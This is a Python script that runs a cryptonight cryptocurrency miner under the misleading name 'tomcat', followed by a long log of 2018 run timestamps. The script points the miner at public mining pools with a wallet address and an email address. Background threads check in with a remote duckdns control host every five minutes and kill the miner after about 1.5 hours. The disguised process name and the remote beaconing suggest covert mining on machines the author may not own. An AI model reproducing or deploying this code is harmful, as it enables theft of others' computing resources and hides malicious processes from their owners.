import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:05.764330
#2018-02-17 17:17:03.838904
#2018-02-17 19:05:06.992194
#2018-02-17 20:53:01.911220
#2018-02-17 22:39:07.377124
#2018-02-18 00:23:03.847281
#2018-02-18 02:14:01.368067
#2018-02-18 04:01:03.980312
#2018-02-18 05:49:01.415671
#2018-02-18 07:41:01.764602
#2018-02-18 09:28:01.771256
#2018-02-18 11:14:05.282994
#2018-02-18 13:01:03.909607
#2018-02-18 14:48:07.246827
#2018-02-18 16:35:07.858597
#2018-02-18 18:24:07.538556
#2018-02-18 20:11:04.989249
#2018-02-18 21:57:02.181120
#2018-02-18 23:46:04.684727
#2018-02-19 01:32:05.026883
#2018-02-19 03:20:07.611570
#2018-02-19 05:05:07.568318
#2018-02-19 06:51:07.062968
#2018-02-19 08:40:08.806823
#2018-02-19 10:29:08.252668
#2018-02-19 12:17:04.890438
#2018-02-19 14:04:01.487670
#2018-02-19 15:53:04.637959
#2018-02-19 17:41:01.653982
#2018-02-19 19:29:02.171572
#2018-02-19 21:16:06.368980
#2018-02-19 23:02:07.714160
#2018-02-20 00:46:07.803108
#2018-02-20 02:34:08.468676
#2018-02-20 04:24:05.497057
#2018-02-20 06:08:06.439196
#2018-02-20 07:53:02.053093
#2018-02-20 09:38:05.199608
#2018-02-20 11:22:08.101785
#2018-02-20 13:10:09.450734
#2018-02-20 14:56:07.518988
#2018-02-20 16:41:07.206366
#2018-02-20 18:26:08.176368
#2018-02-20 20:18:07.996313
#2018-02-20 22:05:04.214836
#2018-02-20 23:46:04.472066
#2018-02-21 01:33:04.590142
#2018-02-21 03:20:05.925029
#2018-02-21 05:09:06.146413
#2018-02-21 06:57:04.103221
#2018-02-21 08:44:01.717055
#2018-02-21 10:31:08.108696
#2018-02-21 12:18:05.306374
#2018-02-21 14:05:09.093782
#2018-02-21 15:49:09.456984
#2018-02-21 17:40:08.727228
#2018-02-21 19:26:07.886757
#2018-02-21 21:14:01.677024
#2018-02-21 23:00:03.439405
#2018-02-22 00:49:01.658321
#2018-02-22 02:36:01.920351
#2018-02-22 04:22:07.946539
#2018-02-22 06:08:01.461912
#2018-02-22 07:53:05.075035
#2018-02-22 09:41:05.899312
#2018-02-22 11:26:07.729145
#2018-02-22 13:11:08.709870
#2018-02-22 14:59:01.533887
#2018-02-22 16:43:09.966250
#2018-02-22 18:29:11.690798
#2018-02-22 20:22:01.275133
#2018-02-22 22:08:04.775462
#2018-02-22 23:54:01.732437
#2018-02-23 01:42:06.345851
#2018-02-23 03:28:05.013591
#2018-02-23 05:15:08.355188
#2018-02-23 07:02:07.130450
#2018-02-23 08:52:07.592996
#2018-02-23 11:10:01.478982
#2018-02-23 13:03:04.289368
#2018-02-23 14:49:01.232857
#2018-02-23 16:38:05.689053
#2018-02-23 18:24:06.442937
#2018-02-23 20:09:05.118744
#2018-02-23 21:58:06.305112
#2018-02-23 23:46:01.355422
#2018-02-24 01:38:04.423010
#2018-02-24 03:27:01.863867
#2018-02-24 05:12:04.883487
#2018-02-24 07:00:04.012364
#2018-02-24 08:49:03.204103
#2018-02-24 10:51:06.004258
#2018-02-24 12:39:05.029408
#2018-02-24 14:27:03.456039
#2018-02-24 16:15:08.247608
#2018-02-24 18:07:07.235648
#2018-02-24 19:53:03.213316
#2018-02-24 21:37:07.568853
#2018-02-25 01:52:06.148410
#2018-02-25 04:57:06.817134
#2018-02-25 09:30:01.508782